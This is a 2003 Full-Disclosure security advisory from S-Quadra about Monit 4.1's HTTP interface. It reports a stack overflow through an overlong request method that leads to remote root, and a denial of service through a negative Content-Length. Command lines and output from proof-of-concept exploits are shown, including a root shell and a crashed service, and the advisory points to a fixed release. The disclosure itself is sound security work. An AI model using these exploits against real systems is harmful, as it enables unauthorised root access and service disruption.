[Full-Disclosure] Monit 4.1 HTTP interface multiple security vulnerabilities

From: S-Quadra Security Research (e.legerov_at_s-quadra.com)
Date: 11/24/03

  • Next message: Jakob Lell: "hard links on Linux create local DoS vulnerability and security problems" 
    To: full-disclosure <full-disclosure@lists.netsys.com>, bugtraq <bugtraq@securityfocus.com>
Date: Mon, 24 Nov 2003 16:20:19 +0300

             
                S-Quadra Advisory #2003-11-24

    Topic: Monit 4.1 HTTP interface Multiple Security Vulnerabilities
    Severity: High
    Vendor URL: http://www.tildeslash.com/monit/
    Advisory URL: http://www.s-quadra.com/advisories/Adv-20031124.txt
    Release date: 22 Nov 2003

    1. DESCRIPTION

    Monit (http://www.tildeslash.com/monit/) is a utility for managing and
    monitoring, processes, files, directories and devices on a Unix system.
    It conducts automatic maintenance and repair and can execute meaningful
    causal actions in error situations.
    Monit provides a HTTP(S) interface and you can use a browser to access
    the monit server.

    There exists several security vulnerabilites in Monit HTTP interface,
    which could allow an attacker
    in the worst case to gain root access to the system.

    2. DETAILS

    -- Vulnerability 1: Long http method stack overflow

    By supplying an overly large http request method and attacker could
    trigger a stack overflow condition which may lead to a remote root
    compromise.
    Below is a successfull run of 'xonya' Monit <= 4.1 remote root exploit
    (PoC):

    $./xonya -t 3 -p 2812 192.168.3.12

    Selected platform 3 ...
    Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ...
    Connected to 192.168.3.12:2812
    Sending the request ...
    Got a remote shell:

    Linux 2.4.20 i686 unknown
    uid=0(root) gid=0(root)
    groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    exit

    -- Vulnerability 2: Denial of Service via negative Content-Length field

    By supplying a negative value in Content-Length header an attacker could
    cause a xmalloc() failure and kill a Monit daemon.
    Below is a successfull run of 'donit' Monit <= 4.1 remote Denial of
    Service exploit (PoC):

    $./donit -p 2812 192.168.3.12

    Connecting to 192.168.3.12:2812 ...
    Sending the request ...
    Done.

    $ nc -v 192.168.3.12 2812
    lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused

    3. FIX INFORMATION

    S-Quadra alerted Monit development team to this issue on 21th November 2003.
    New version of Monit 4.1.1 is available at
    http://www.tildeslash.com/monit/dist/monit-4.1.1.tar.gz which fixes the
    reported security vulnerabilities.

    4. CREDITS

    Evgeny Legerov <e.legerov@s-quadra.com> is responsible for discovering
    this issue.

    5. ABOUT

    S-Quadra offers services in computer security, penetration testing and
    network assesment,
    web application security, source code review and third party product
    vulnerability assesment,
    forensic support and reverse engineering.

    Security is an art and our goal is to bring responsible and high quality
    security
    service to the IT market, customized to meet the unique needs of each
    individual client.

    S-Quadra, (pronounced es quadra), is not an acronym.
    It's unique, creative and innovative - just like the security services
    we bring to our clients.

                S-Quadra Advisory #2003-11-24

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Jakob Lell: "hard links on Linux create local DoS vulnerability and security problems"

    Relevant Pages